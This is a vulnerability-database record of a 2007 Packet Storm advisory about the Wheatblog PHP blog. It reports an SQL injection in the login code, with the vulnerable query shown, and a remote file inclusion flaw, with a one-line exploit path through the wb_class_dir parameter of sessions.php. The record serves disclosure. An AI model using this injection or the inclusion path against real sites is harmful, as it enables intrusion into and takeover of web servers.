{"id": "PACKETSTORM:57382", "type": "packetstorm", "bulletinFamily": "exploit", "title": "wheatblog-rfi.txt", "description": "", "published": "2007-07-01T00:00:00", "modified": "2007-07-01T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/57382/wheatblog-rfi.txt.html", "reporter": "Eugene Minaev", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:19:26", "viewCount": 10, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/57382/wheatblog-rfi.txt", "sourceData": "`Found by E.Minaev (underwater@itdefence.ru) \nITDefence.ru \n \n1) SQL injection in the login function. With this injection it is possible to brute-force the table names of the blog's database character by character (magic_quotes_gpc should be turned off). \n \n------------------------------------------ \n\"$sql = \"select * from $tblUsers where login = '$login'\"; \nif ( $login != $row['login'] ) $valid_user = 0; \nif ( $password != $row['password'] ) $valid_user = 0;\" \n------------------------------------------ \n \n2) Remote File Inclusion (RFI) \n/includes/sessions.php?wb_class_dir=shell? \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647126540, "score": 1659769055}}
{}